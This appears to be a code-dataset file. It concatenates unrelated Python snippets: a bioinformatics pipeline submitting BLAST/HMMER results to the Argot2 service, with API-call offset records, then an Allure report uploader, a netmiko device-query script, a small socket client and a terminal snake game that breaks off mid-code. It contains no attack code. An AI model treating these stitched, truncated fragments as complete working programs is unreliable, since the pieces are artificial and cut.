all_tmp_bl_files = sorted(glob(tmp_bl_dir+"/*.xml"))
Parallel(n_jobs=ncpus)(delayed(xml2tsv)(tmp_bl_file) for tmp_bl_file in all_tmp_bl_files)
def compile_blast_tsv(config):
workdir=config["input"]["gomap_dir"]+"/"
num_seqs=int(config["input"]["num_seqs"])
tmp_bl_dir=workdir + config["data"]["mixed-method"]["preprocess"]["blast_out"]+"/temp"
fa_pattern=tmp_bl_dir+"/"+config["input"]["basename"]+"*.fa"
fa_files = natsorted(glob(fa_pattern))
chunks = []
counter_start=0
counter_curr=-1
chunk_seqs = 0
for fa_file in fa_files:
counter_curr = counter_curr+1
all_seqs = list(SeqIO.parse(fa_file, "fasta"))
num_fa_records = len(all_seqs)
chunk_seqs = chunk_seqs + num_fa_records
if chunk_seqs % num_seqs == 0:
tmp_xml = [re.sub(r'\.fa$','.tsv',x) for x in fa_files[counter_start:counter_curr+1]]
chunks.append(tmp_xml)
counter_start = counter_curr+1
elif counter_curr+1 == len(fa_files):
tmp_xml = [re.sub(r'\.fa$','.tsv',x) for x in fa_files[counter_start:]]
chunks.append(tmp_xml)
argot_tsv_dir=workdir + config["data"]["mixed-method"]["argot2"]["preprocess"]["blast"]+"/"
for i in range(len(chunks)):
tsv_out=argot_tsv_dir+config["input"]["basename"]+"."+str(i+1)+".tsv"
zipfile_loc=tsv_out+'.zip'
concat_tsv(chunks[i],tsv_out)
if os.path.isfile(zipfile_loc):
logging.info(zipfile_loc +" already exists. Please delete if you need this recreated")
else:
zf = zipfile.ZipFile(zipfile_loc, mode='w',compression=zipfile.ZIP_DEFLATED)
zf.write(tsv_out,os.path.basename(tsv_out))
def run_hmmer(config):
workdir = config["input"]["gomap_dir"] + "/"
fa_dir = workdir+config["input"]["split_path"]
fa_files = natsorted(glob(fa_dir+"/*fa"))
hmmer_bin = config["software"]["hmmer"]["path"]+"/hmmscan"
hmmerdb=config["data"]["mixed-method"]["preprocess"]["hmmerdb"]
cpu = str(config["input"]["cpus"])
tmp_file=workdir+"hmmscan.tmp"
num_seqs=int(config["input"]["num_seqs"])
chunks = []
counter_start=0
counter_curr=-1
chunk_seqs = 0
chunk_count=0
all_seqs = []
for fa_file in fa_files:
counter_curr = counter_curr+1
seqs = list(SeqIO.parse(fa_file, "fasta"))
num_fa_records = len(seqs)
chunk_seqs = chunk_seqs + num_fa_records
all_seqs = all_seqs + seqs
if chunk_seqs % num_seqs == 0 or fa_file == fa_files[-1]:
chunk_count=chunk_count+1
out_fa=workdir+config["data"]["mixed-method"]["argot2"]["preprocess"]["hmmer"] + "/" + config["input"]["basename"]+"."+str(chunk_count)+".fa"
SeqIO.write(all_seqs, out_fa, "fasta")
all_seqs=[]
chunk_seqs=0
hmmer_dir=workdir+config["data"]["mixed-method"]["argot2"]["preprocess"]["hmmer"]
fa_files = glob(hmmer_dir+"/*fa")
for infile in fa_files:
outfile = re.sub("\.fa",".hmm.out",infile)
cmd = [hmmer_bin,"-o",tmp_file,"--tblout",outfile,"--cpu",cpu,hmmerdb,infile]
zipfile_loc = outfile+".zip"
check_output_and_run(zipfile_loc,cmd)
if os.path.exists(outfile):
zf = zipfile.ZipFile(zipfile_loc, 'w',zipfile.ZIP_DEFLATED)
zf.write(outfile,os.path.basename(outfile))
if os.path.isfile(tmp_file):
os.remove(tmp_file)
def submit_argot2(config):
workdir = config["input"]["gomap_dir"] + "/"
argot_config=config["data"]["mixed-method"]["argot2"]
argot2_blast_dir=workdir+argot_config["preprocess"]["blast"]+"/"
argot2_hmmer_dir=workdir+argot_config["preprocess"]["hmmer"]+"/"
fa_path=workdir + config["data"]["mixed-method"]["preprocess"]["fa_path"]+"/"
tsv_pattern=argot2_blast_dir+"*tsv"
tsv_files = [ re.sub(".tsv","",os.path.basename(fa_file)) for fa_file in glob(tsv_pattern)]
for tsv_file in tsv_files:
blast_file=glob(argot2_blast_dir+tsv_file+"*tsv.zip")[0]
hmmer_file=glob(argot2_hmmer_dir+tsv_file+"*out.zip")[0]
payload=argot_config["payload"]
payload["email"] = config["input"]["email"]
payload["descr"] = tsv_file
payload['scient_name'] = config["input"]["species"]
payload["tax_id"] = config["input"]["taxon"]
payload["taxon_ID"] = config["input"]["taxon"]
files={
"blast_file":(blast_file,open(blast_file, 'rb'),'text/plain'),
"hmmer_file":(hmmer_file,open(hmmer_file, 'rb'),'text/plain')
}
headers = {
"Host": "www.medcomp.medicina.unipd.it",
"Origin": "www.medcomp.medicina.unipd.it",
'User-agent': 'Mozilla/5.0 (X11; Linux x86_64)',
'Referer': "http://www.medcomp.medicina.unipd.it/Argot2-5/form_batch.php",
"Accept-Encoding": "gzip, deflate",
"Cache-Control": "no-cache",
"Upgrade-Insecure-Requests": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.9",
"Pragma": "no-cache",
"Connection": "keep-alive"
}
argot_url=argot_config["batch_url"]
html_file=workdir+argot_config["preprocess"]["html"]+"/"+tsv_file+".insert.html"
if os.path.isfile(html_file):
logging.info("This file has been previously submitted")
logging.info("Remove "+html_file+ " to resubmit")
else:
logging.info("Submitting %s and %s to Argot2.5" % (os.path.basename(blast_file),os.path.basename(hmmer_file)))
print("Submitting %s and %s to Argot2.5" % (os.path.basename(blast_file),os.path.basename(hmmer_file)))
s = requests.session()
r_batch = s.post("http://www.medcomp.medicina.unipd.it/Argot2-5/form_batch.php",headers=headers)
#r_batch = s.post("http://localhost/test/upload.php",headers=headers,data=payload,files=files)
r_insert = s.post(argot_url,data=payload,files=files,headers=headers)
with open(html_file,"w") as outfile:
outfile.writelines(r_insert.text)
def download_argot2(config):
workdir = config["input"]["gomap_dir"] + "/"
argot_config=config["data"]["mixed-method"]["argot2"]
html_dir=workdir+argot_config["preprocess"]["html"]+"/"
result_dir=workdir+argot_config["result_dir"]+"/"
argot_files = glob(html_dir+"*html")
for argot_file in argot_files:
result_file = result_dir+re.sub(".insert.html",".tsv",os.path.basename(argot_file))
if os.path.isfile(result_file):
logging.info("The result file already exists.")
logging.info("Delete "+result_file+" if you want to redownload it" )
else:
logging.info("Downloading results for " +os.path.basename(result_file) + " from Argot2.5 webservice")
tree = html.parse(argot_file)
all_links = tree.findall(".//a")
link_href = [ link.attrib["href"] for link in all_links if "getStatus_batch.php" in link.attrib["href"] ][0]
res_link = re.sub("getStatus_batch.php","viewResults_batch.php",link_href)
r = requests.get(res_link)
res_tree = html.fromstring(r.text)
all_links = res_tree.findall(".//a")
csv_href = argot_config["baseurl"]+"/"+[ link.attrib["href"] for link in all_links if "getTSVFile.php" in link.attrib["href"] ][0]
csv_r = requests.get(csv_href)
with open(result_file+".zip","w") as outfile:
outfile.write(csv_r.content)
# r = requests.get(csv_href)
# with open("")
def process_argot2(config):
workdir = config["input"]["gomap_dir"] + "/"
result_dir = workdir + config["data"]["mixed-method"]["argot2"]["result_dir"]
zipfiles=glob(result_dir+"/*zip")
for result_zip in zipfiles:
outfile=re.sub(r".zip","",result_zip)
if not os.path.isfile(outfile):
logging.info("Unzipping " + os.path.basename(result_zip))
archive = zipfile.ZipFile(result_zip)
result_file="argot_results_ts0.tsv"
archive.extract(result_file,workdir)
shutil.move(workdir+"/"+result_file, outfile)
else:
logging.info("Outfile " + outfile + " already exists.\n Please deltreeit to regenerate")
|
[
"os.remove",
"Bio.SeqIO.write",
"os.path.isfile",
"glob.glob",
"lxml.html.parse",
"os.path.exists",
"lxml.html.fromstring",
"requests.get",
"lxml.etree.parse",
"re.sub",
"requests.session",
"Bio.SeqIO.parse",
"os.path.basename",
"lxml.etree.XSLT",
"code.utils.basic_utils.check_output_and_run",
"re.match",
"zipfile.ZipFile",
"logging.info",
"shutil.move",
"joblib.Parallel",
"joblib.delayed"
] |
[((394, 423), 're.sub', 're.sub', (['"""xml$"""', '"""tsv"""', 'in_xml'], {}), "('xml$', 'tsv', in_xml)\n", (400, 423), False, 'import logging, os, re, sys, shutil\n'), ((4554, 4578), 'glob.glob', 'glob', (["(hmmer_dir + '/*fa')"], {}), "(hmmer_dir + '/*fa')\n", (4558, 4578), False, 'from glob import glob\n'), ((8155, 8179), 'glob.glob', 'glob', (["(html_dir + '*html')"], {}), "(html_dir + '*html')\n", (8159, 8179), False, 'from glob import glob\n'), ((9566, 9592), 'glob.glob', 'glob', (["(result_dir + '/*zip')"], {}), "(result_dir + '/*zip')\n", (9570, 9592), False, 'from glob import glob\n'), ((434, 457), 'os.path.exists', 'os.path.exists', (['out_tsv'], {}), '(out_tsv)\n', (448, 457), False, 'import logging, os, re, sys, shutil\n'), ((467, 525), 'logging.info', 'logging.info', (["('Converting %s into %s.' % (in_xml, out_tsv))"], {}), "('Converting %s into %s.' % (in_xml, out_tsv))\n", (479, 525), False, 'import logging, os, re, sys, shutil\n'), ((545, 583), 'lxml.etree.parse', 'etree.parse', (['"""config/bl_xml2argot.xsl"""'], {}), "('config/bl_xml2argot.xsl')\n", (556, 583), False, 'from lxml import etree, html\n'), ((604, 625), 'lxml.etree.XSLT', 'etree.XSLT', (['xslt_root'], {}), '(xslt_root)\n', (614, 625), False, 'from lxml import etree, html\n'), ((644, 663), 'lxml.etree.parse', 'etree.parse', (['in_xml'], {}), '(in_xml)\n', (655, 663), False, 'from lxml import etree, html\n'), ((949, 1034), 'logging.info', 'logging.info', (["('Not converting %s into %s. Output file exists' % (in_xml, out_tsv))"], {}), "('Not converting %s into %s. Output file exists' % (in_xml,\n out_tsv))\n", (961, 1034), False, 'import logging, os, re, sys, shutil\n'), ((1613, 1640), 'glob.glob', 'glob', (["(tmp_bl_dir + '/*.xml')"], {}), "(tmp_bl_dir + '/*.xml')\n", (1617, 1640), False, 'from glob import glob\n'), ((1645, 1667), 'joblib.Parallel', 'Parallel', ([], {'n_jobs': 'ncpus'}), '(n_jobs=ncpus)\n', (1653, 1667), False, 'from joblib import Parallel, delayed\n'), ((2039, 2055), 'glob.glob', 'glob', (['fa_pattern'], {}), '(fa_pattern)\n', (2043, 2055), False, 'from glob import glob\n'), ((3019, 3046), 'os.path.isfile', 'os.path.isfile', (['zipfile_loc'], {}), '(zipfile_loc)\n', (3033, 3046), False, 'import logging, os, re, sys, shutil\n'), ((3464, 3485), 'glob.glob', 'glob', (["(fa_dir + '/*fa')"], {}), "(fa_dir + '/*fa')\n", (3468, 3485), False, 'from glob import glob\n'), ((4623, 4658), 're.sub', 're.sub', (['"""\\\\.fa"""', '""".hmm.out"""', 'infile'], {}), "('\\\\.fa', '.hmm.out', infile)\n", (4629, 4658), False, 'import logging, os, re, sys, shutil\n'), ((4787, 4825), 'code.utils.basic_utils.check_output_and_run', 'check_output_and_run', (['zipfile_loc', 'cmd'], {}), '(zipfile_loc, cmd)\n', (4807, 4825), False, 'from code.utils.basic_utils import check_output_and_run\n'), ((4836, 4859), 'os.path.exists', 'os.path.exists', (['outfile'], {}), '(outfile)\n', (4850, 4859), False, 'import logging, os, re, sys, shutil\n'), ((5000, 5024), 'os.path.isfile', 'os.path.isfile', (['tmp_file'], {}), '(tmp_file)\n', (5014, 5024), False, 'import logging, os, re, sys, shutil\n'), ((7034, 7059), 'os.path.isfile', 'os.path.isfile', (['html_file'], {}), '(html_file)\n', (7048, 7059), False, 'import logging, os, re, sys, shutil\n'), ((8316, 8343), 'os.path.isfile', 'os.path.isfile', (['result_file'], {}), '(result_file)\n', (8330, 8343), False, 'import logging, os, re, sys, shutil\n'), ((9639, 9669), 're.sub', 're.sub', (['""".zip"""', '""""""', 'result_zip'], {}), "('.zip', '', result_zip)\n", (9645, 9669), False, 'import logging, os, re, sys, shutil\n'), ((2224, 2253), 'Bio.SeqIO.parse', 'SeqIO.parse', (['fa_file', '"""fasta"""'], {}), "(fa_file, 'fasta')\n", (2235, 2253), False, 'from Bio import SeqIO\n'), ((3060, 3151), 'logging.info', 'logging.info', (["(zipfile_loc + ' already exists. Please delete if you need this recreated')"], {}), "(zipfile_loc +\n ' already exists. Please delete if you need this recreated')\n", (3072, 3151), False, 'import logging, os, re, sys, shutil\n'), ((3178, 3250), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zipfile_loc'], {'mode': '"""w"""', 'compression': 'zipfile.ZIP_DEFLATED'}), "(zipfile_loc, mode='w', compression=zipfile.ZIP_DEFLATED)\n", (3193, 3250), False, 'import zipfile\n'), ((3935, 3964), 'Bio.SeqIO.parse', 'SeqIO.parse', (['fa_file', '"""fasta"""'], {}), "(fa_file, 'fasta')\n", (3946, 3964), False, 'from Bio import SeqIO\n'), ((4356, 4394), 'Bio.SeqIO.write', 'SeqIO.write', (['all_seqs', 'out_fa', '"""fasta"""'], {}), "(all_seqs, out_fa, 'fasta')\n", (4367, 4394), False, 'from Bio import SeqIO\n'), ((4878, 4933), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zipfile_loc', '"""w"""', 'zipfile.ZIP_DEFLATED'], {}), "(zipfile_loc, 'w', zipfile.ZIP_DEFLATED)\n", (4893, 4933), False, 'import zipfile\n'), ((5038, 5057), 'os.remove', 'os.remove', (['tmp_file'], {}), '(tmp_file)\n', (5047, 5057), False, 'import logging, os, re, sys, shutil\n'), ((5497, 5522), 'os.path.basename', 'os.path.basename', (['fa_file'], {}), '(fa_file)\n', (5513, 5522), False, 'import logging, os, re, sys, shutil\n'), ((5539, 5556), 'glob.glob', 'glob', (['tsv_pattern'], {}), '(tsv_pattern)\n', (5543, 5556), False, 'from glob import glob\n'), ((5608, 5654), 'glob.glob', 'glob', (["(argot2_blast_dir + tsv_file + '*tsv.zip')"], {}), "(argot2_blast_dir + tsv_file + '*tsv.zip')\n", (5612, 5654), False, 'from glob import glob\n'), ((5673, 5719), 'glob.glob', 'glob', (["(argot2_hmmer_dir + tsv_file + '*out.zip')"], {}), "(argot2_hmmer_dir + tsv_file + '*out.zip')\n", (5677, 5719), False, 'from glob import glob\n'), ((7073, 7128), 'logging.info', 'logging.info', (['"""This file has been previously submitted"""'], {}), "('This file has been previously submitted')\n", (7085, 7128), False, 'import logging, os, re, sys, shutil\n'), ((7141, 7193), 'logging.info', 'logging.info', (["('Remove ' + html_file + ' to resubmit')"], {}), "('Remove ' + html_file + ' to resubmit')\n", (7153, 7193), False, 'import logging, os, re, sys, shutil\n'), ((7460, 7478), 'requests.session', 'requests.session', ([], {}), '()\n', (7476, 7478), False, 'import requests\n'), ((8357, 8404), 'logging.info', 'logging.info', (['"""The result file already exists."""'], {}), "('The result file already exists.')\n", (8369, 8404), False, 'import logging, os, re, sys, shutil\n'), ((8417, 8488), 'logging.info', 'logging.info', (["('Delete ' + result_file + ' if you want to redownload it')"], {}), "('Delete ' + result_file + ' if you want to redownload it')\n", (8429, 8488), False, 'import logging, os, re, sys, shutil\n'), ((8633, 8655), 'lxml.html.parse', 'html.parse', (['argot_file'], {}), '(argot_file)\n', (8643, 8655), False, 'from lxml import etree, html\n'), ((8845, 8910), 're.sub', 're.sub', (['"""getStatus_batch.php"""', '"""viewResults_batch.php"""', 'link_href'], {}), "('getStatus_batch.php', 'viewResults_batch.php', link_href)\n", (8851, 8910), False, 'import logging, os, re, sys, shutil\n'), ((8925, 8947), 'requests.get', 'requests.get', (['res_link'], {}), '(res_link)\n', (8937, 8947), False, 'import requests\n'), ((8971, 8994), 'lxml.html.fromstring', 'html.fromstring', (['r.text'], {}), '(r.text)\n', (8986, 8994), False, 'from lxml import etree, html\n'), ((9208, 9230), 'requests.get', 'requests.get', (['csv_href'], {}), '(csv_href)\n', (9220, 9230), False, 'import requests\n'), ((9684, 9707), 'os.path.isfile', 'os.path.isfile', (['outfile'], {}), '(outfile)\n', (9698, 9707), False, 'import logging, os, re, sys, shutil\n'), ((9801, 9828), 'zipfile.ZipFile', 'zipfile.ZipFile', (['result_zip'], {}), '(result_zip)\n', (9816, 9828), False, 'import zipfile\n'), ((9938, 9987), 'shutil.move', 'shutil.move', (["(workdir + '/' + result_file)", 'outfile'], {}), "(workdir + '/' + result_file, outfile)\n", (9949, 9987), False, 'import logging, os, re, sys, shutil\n'), ((10010, 10105), 'logging.info', 'logging.info', (['(\'Outfile \' + outfile + """ already exists.\n Please deltreeit to regenerate""")'], {}), '(\'Outfile \' + outfile +\n """ already exists.\n Please deltreeit to regenerate""")\n', (10022, 10105), False, 'import logging, os, re, sys, shutil\n'), ((756, 785), 're.match', 're.match', (['"""[0-9A-Za-z]"""', 'line'], {}), "('[0-9A-Za-z]', line)\n", (764, 785), False, 'import logging, os, re, sys, shutil\n'), ((1668, 1684), 'joblib.delayed', 'delayed', (['xml2tsv'], {}), '(xml2tsv)\n', (1675, 1684), False, 'from joblib import Parallel, delayed\n'), ((2405, 2432), 're.sub', 're.sub', (['"""\\\\.fa$"""', '""".tsv"""', 'x'], {}), "('\\\\.fa$', '.tsv', x)\n", (2411, 2432), False, 'import logging, os, re, sys, shutil\n'), ((3279, 3304), 'os.path.basename', 'os.path.basename', (['tsv_out'], {}), '(tsv_out)\n', (3295, 3304), False, 'import logging, os, re, sys, shutil\n'), ((4962, 4987), 'os.path.basename', 'os.path.basename', (['outfile'], {}), '(outfile)\n', (4978, 4987), False, 'import logging, os, re, sys, shutil\n'), ((8275, 8303), 'os.path.basename', 'os.path.basename', (['argot_file'], {}), '(argot_file)\n', (8291, 8303), False, 'import logging, os, re, sys, shutil\n'), ((2627, 2654), 're.sub', 're.sub', (['"""\\\\.fa$"""', '""".tsv"""', 'x'], {}), "('\\\\.fa$', '.tsv', x)\n", (2633, 2654), False, 'import logging, os, re, sys, shutil\n'), ((9749, 9777), 'os.path.basename', 'os.path.basename', (['result_zip'], {}), '(result_zip)\n', (9765, 9777), False, 'import logging, os, re, sys, shutil\n'), ((7268, 7296), 'os.path.basename', 'os.path.basename', (['blast_file'], {}), '(blast_file)\n', (7284, 7296), False, 'import logging, os, re, sys, shutil\n'), ((7297, 7325), 'os.path.basename', 'os.path.basename', (['hmmer_file'], {}), '(hmmer_file)\n', (7313, 7325), False, 'import logging, os, re, sys, shutil\n'), ((7384, 7412), 'os.path.basename', 'os.path.basename', (['blast_file'], {}), '(blast_file)\n', (7400, 7412), False, 'import logging, os, re, sys, shutil\n'), ((7413, 7441), 'os.path.basename', 'os.path.basename', (['hmmer_file'], {}), '(hmmer_file)\n', (7429, 7441), False, 'import logging, os, re, sys, shutil\n'), ((8553, 8582), 'os.path.basename', 'os.path.basename', (['result_file'], {}), '(result_file)\n', (8569, 8582), False, 'import logging, os, re, sys, shutil\n')]
|
import time
import logging
import os
import requests
import base64
logger = logging.getLogger()
def pytest_addoption(parser):
"""
Parse pytest options
:param parser: pytest buildin
"""
parser.addoption('--allure_server_addr', action='store', default=None, help='Allure server address: IP/domain name')
parser.addoption('--allure_server_port', action='store', default=5050, help='Allure server port')
parser.addoption('--allure_server_project_id', action='store', default=None, help='Allure server project ID')
def pytest_sessionfinish(session, exitstatus):
"""
Pytest hook which are executed after all tests before exist from program
:param session: pytest buildin
:param exitstatus: pytest buildin
"""
if not session.config.getoption("--collectonly"):
allure_server_addr = session.config.option.allure_server_addr
allure_server_port = session.config.option.allure_server_port
allure_server_project_id = session.config.option.allure_server_project_id
if allure_server_addr:
allure_report_dir = session.config.option.allure_report_dir
if allure_report_dir:
try:
allure_server_odb = AllureServer(allure_server_addr, allure_server_port, allure_report_dir,
allure_server_project_id)
allure_server_odb.generate_allure_report()
except Exception as err:
logger.error('Failed to upload allure report to server. Allure report not available. '
'\nError: {}'.format(err))
else:
logger.error('PyTest argument "--alluredir" not provided. Impossible to generate Allure report')
def get_time_stamp_str():
"""
This method return string with current time
:return: string, example: 16063138520755782
"""
current_time = time.time()
current_time_without_dot = str(current_time).replace('.', '')
return current_time_without_dot
class AllureServer:
def __init__(self, allure_server_ip, allure_server_port, allure_report_dir, project_id=None):
self.allure_report_dir = allure_report_dir
self.base_url = 'http://{}:{}/allure-docker-service'.format(allure_server_ip, allure_server_port)
self.project_id = project_id if project_id else get_time_stamp_str()
self.http_headers = {'Content-type': 'application/json'}
def generate_allure_report(self):
"""
This method creates new project(if need) on allure server, uploads test results to server and generates report
"""
self.create_project_on_allure_server()
self.upload_results_to_allure_server()
self.generate_report_on_allure_server()
def create_project_on_allure_server(self):
"""
This method creates new project(if need) on allure server
"""
data = {'id': self.project_id}
url = self.base_url + '/projects'
if requests.get(url + '/' + self.project_id).status_code != 200:
logger.info('Creating project {} on allure server'.format(self.project_id))
response = requests.post(url, json=data, headers=self.http_headers)
if response.raise_for_status():
logger.error('Failed to create project on allure server, error: {}'.format(response.content))
else:
logger.info('Allure project {} already exist on server. No need to create project'.format(self.project_id))
def upload_results_to_allure_server(self):
"""
This method uploads files from allure results folder to allure server
"""
data = {'results': self.get_allure_files_content()}
url = self.base_url + '/send-results?project_id=' + self.project_id
logger.info('Sending allure results to allure server')
response = requests.post(url, json=data, headers=self.http_headers)
if response.raise_for_status():
logger.error('Failed to upload results to allure server, error: {}'.format(response.content))
def get_allure_files_content(self):
"""
This method creates a list all files under allure report folder
:return: list with allure folder content, example [{'file1': 'file content'}, {'file2': 'file2 content'}]
"""
files = os.listdir(self.allure_report_dir)
results = []
for file in files:
result = {}
file_path = self.allure_report_dir + "/" + file
if os.path.isfile(file_path):
try:
with open(file_path, "rb") as f:
content = f.read()
if content.strip():
b64_content = base64.b64encode(content)
result['file_name'] = file
result['content_base64'] = b64_content.decode('UTF-8')
results.append(result)
finally:
f.close()
return results
def generate_report_on_allure_server(self):
"""
This method would generate the report on the remote allure server and display the report URL in the log
"""
logger.info('Generating report on allure server')
url = self.base_url + '/generate-report?project_id=' + self.project_id
response = requests.get(url, headers=self.http_headers)
if response.raise_for_status():
logger.error('Failed to generate report on allure server, error: {}'.format(response.content))
else:
report_url = response.json()['data']['report_url']
logger.info('Allure report URL: {}'.format(report_url))
|
[
"time.time",
"os.path.isfile",
"base64.b64encode",
"requests.get",
"requests.post",
"os.listdir",
"logging.getLogger"
] |
[((77, 96), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (94, 96), False, 'import logging\n'), ((1943, 1954), 'time.time', 'time.time', ([], {}), '()\n', (1952, 1954), False, 'import time\n'), ((3918, 3974), 'requests.post', 'requests.post', (['url'], {'json': 'data', 'headers': 'self.http_headers'}), '(url, json=data, headers=self.http_headers)\n', (3931, 3974), False, 'import requests\n'), ((4388, 4422), 'os.listdir', 'os.listdir', (['self.allure_report_dir'], {}), '(self.allure_report_dir)\n', (4398, 4422), False, 'import os\n'), ((5435, 5479), 'requests.get', 'requests.get', (['url'], {'headers': 'self.http_headers'}), '(url, headers=self.http_headers)\n', (5447, 5479), False, 'import requests\n'), ((3204, 3260), 'requests.post', 'requests.post', (['url'], {'json': 'data', 'headers': 'self.http_headers'}), '(url, json=data, headers=self.http_headers)\n', (3217, 3260), False, 'import requests\n'), ((4571, 4596), 'os.path.isfile', 'os.path.isfile', (['file_path'], {}), '(file_path)\n', (4585, 4596), False, 'import os\n'), ((3031, 3072), 'requests.get', 'requests.get', (["(url + '/' + self.project_id)"], {}), "(url + '/' + self.project_id)\n", (3043, 3072), False, 'import requests\n'), ((4801, 4826), 'base64.b64encode', 'base64.b64encode', (['content'], {}), '(content)\n', (4817, 4826), False, 'import base64\n')]
|
from concurrent.futures import ThreadPoolExecutor
import re
from pprint import pprint
from itertools import repeat
import logging
import netmiko
import paramiko
import yaml
logging.getLogger("paramiko").setLevel(logging.WARNING)
logging.getLogger("netmiko").setLevel(logging.WARNING)
logging.basicConfig(
format="%(threadName)s %(name)s %(levelname)s: %(message)s", level=logging.INFO
)
def send_show_command(device, show):
host = device["host"]
logging.info(f">>> Connecting to {host}")
try:
with netmiko.Netmiko(**device) as ssh:
ssh.enable()
output = ssh.send_command(show)
logging.debug(f"\n{output}\n")
logging.info(f"<<< Received output from {host}")
return output
except netmiko.NetmikoTimeoutException as error:
logging.info(f"Failed to connect to {host}")
except paramiko.ssh_exception.AuthenticationException:
logging.info(f"Authentication error on {host}")
def send_show_to_devices(devices, show, max_threads=10):
result_dict = {}
with ThreadPoolExecutor(max_workers=max_threads) as executor:
results = executor.map(send_show_command, devices, repeat(show))
for dev, output in zip(devices, results):
result_dict[dev["host"]] = output
return result_dict
if __name__ == "__main__":
with open("devices.yaml") as f:
devices = yaml.safe_load(f)
r = send_show_to_devices(devices, "sh int desc")
pprint(r, width=120)
|
[
"netmiko.Netmiko",
"itertools.repeat",
"logging.debug",
"logging.basicConfig",
"logging.info",
"yaml.safe_load",
"pprint.pprint",
"concurrent.futures.ThreadPoolExecutor",
"logging.getLogger"
] |
[((288, 393), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(threadName)s %(name)s %(levelname)s: %(message)s"""', 'level': 'logging.INFO'}), "(format=\n '%(threadName)s %(name)s %(levelname)s: %(message)s', level=logging.INFO)\n", (307, 393), False, 'import logging\n'), ((464, 505), 'logging.info', 'logging.info', (['f""">>> Connecting to {host}"""'], {}), "(f'>>> Connecting to {host}')\n", (476, 505), False, 'import logging\n'), ((1478, 1498), 'pprint.pprint', 'pprint', (['r'], {'width': '(120)'}), '(r, width=120)\n', (1484, 1498), False, 'from pprint import pprint\n'), ((176, 205), 'logging.getLogger', 'logging.getLogger', (['"""paramiko"""'], {}), "('paramiko')\n", (193, 205), False, 'import logging\n'), ((232, 260), 'logging.getLogger', 'logging.getLogger', (['"""netmiko"""'], {}), "('netmiko')\n", (249, 260), False, 'import logging\n'), ((1071, 1114), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {'max_workers': 'max_threads'}), '(max_workers=max_threads)\n', (1089, 1114), False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((1403, 1420), 'yaml.safe_load', 'yaml.safe_load', (['f'], {}), '(f)\n', (1417, 1420), False, 'import yaml\n'), ((528, 553), 'netmiko.Netmiko', 'netmiko.Netmiko', ([], {}), '(**device)\n', (543, 553), False, 'import netmiko\n'), ((643, 673), 'logging.debug', 'logging.debug', (['f"""\n{output}\n"""'], {}), "(f'\\n{output}\\n')\n", (656, 673), False, 'import logging\n'), ((686, 734), 'logging.info', 'logging.info', (['f"""<<< Received output from {host}"""'], {}), "(f'<<< Received output from {host}')\n", (698, 734), False, 'import logging\n'), ((822, 866), 'logging.info', 'logging.info', (['f"""Failed to connect to {host}"""'], {}), "(f'Failed to connect to {host}')\n", (834, 866), False, 'import logging\n'), ((934, 981), 'logging.info', 'logging.info', (['f"""Authentication error on {host}"""'], {}), "(f'Authentication error on {host}')\n", (946, 981), False, 'import logging\n'), ((1187, 1199), 'itertools.repeat', 'repeat', (['show'], {}), '(show)\n', (1193, 1199), False, 'from itertools import repeat\n')]
|
import socket
s = socket.socket()
s.connect(('192.168.2.10', 1234))
data = s.recv(1024)
s.close()
print('Received', data)
|
[
"socket.socket"
] |
[((19, 34), 'socket.socket', 'socket.socket', ([], {}), '()\n', (32, 34), False, 'import socket\n')]
|
from __future__ import print_function
import os
osName = os.name
clearCommand = 'cls' if osName == 'nt' else 'clear'
if osName == "nt":
import msvcrt
import colorama
colorama.init()
else:
import sys
import select
import tty
import termios
import threading
import time
import random
import maps
# Clear the screen (works on both windows and linux)
def clear():
os.system(clearCommand)
# The INITIAL map - this is converted into a gameMapList list at the start
# Do NOT edit this during the game execution, edit gameMapList instead
gameMap = """
############################################################
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
# #
############################################################
"""
# Scan the maps.py file
def fetch_maps():
running = True
count = 1
output = ["0) Default"]
while running:
try:
output.append(f"{count}) " + getattr(maps, f"map{count}")[0])
count += 1
except AttributeError:
running = False
return output
# Get the user's input to choose a map
print(*fetch_maps(), sep="\n")
maps_prompt_input = input("> ")
# Select the map according to the user's input
if maps_prompt_input.strip() != "0" and maps_prompt_input.strip() != "":
gameMap = getattr(maps, f"map{maps_prompt_input}")[1]
mapX = len(gameMap.split("\n")[1]) # Get the length of the map
mapY = len(gameMap.split("\n")) - 2 # Get the height of the map
# Convert gameMap to a list so it can be manipulated
gameMapList = list(gameMap)
# Clear the screen and print the stuff contained in gameMapList
def update_map():
global gameMap
gameMap = ''.join(gameMapList)
clear()
print(gameMap)
# Change an element in the list gameMapList at (x, y) -> index
# Note that this doesn't call the update_map() function
def change_char_at(char, x, y):
global gameMapList
global mapX
gameMapList[(mapX * (y - 1) + x) + y - 1] = char
# This is executed in a thread to get the user's input
# without stopping the program
def unix_input_key_pressed():
return select.select([sys.stdin], [], [], 0) == ([sys.stdin], [], [])
def unix_input_read_key():
return sys.stdin.read(1)
def unix_input_restore_settings():
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings)
if osName != "nt":
old_settings = termios.tcgetattr(sys.stdin)
tty.setcbreak(sys.stdin.fileno())
def input_listener():
global currentInput
while True:
if osName == 'nt':
currentInput = msvcrt.getch().decode("utf-8").lower()
elif unix_input_key_pressed():
currentInput = unix_input_read_key().lower()
# The snake/player class
class Snake:
def __init__(self, x, y, head, body):
self.going = "d"
self.x = x
self.y = y
self.positions = []
self.eatenApples = 1
self.dead = False
self.head = head
self.body = body
self.loopCount = 0
def die(self):
self.dead = True
print("\u001b[31mYOU DIED\u001b[0m")
if osName != "nt":
unix_input_restore_settings()
input()
exit()
# Main method
def update(self):
def change_dir():
global currentInput
if currentInput == "d":
if self.going != "a":
self.going = "d"
self.x += 1
else:
currentInput = self.going
self.x -= 1
elif currentInput == "a":
if self.going != "d":
self.going = "a"
self.x -= 1
else:
currentInput = self.going
self.x += 1
elif currentInput == "w":
if self.going != "s":
self.going = "w"
self.y -= 1
else:
currentInput = self.going
self.y += 1
elif currentInput == "s":
if self.going != "w":
self.going = "s"
self.y += 1
else:
currentInput = self.going
self.y -= 1
else:
currentInput = self.going
change_dir()
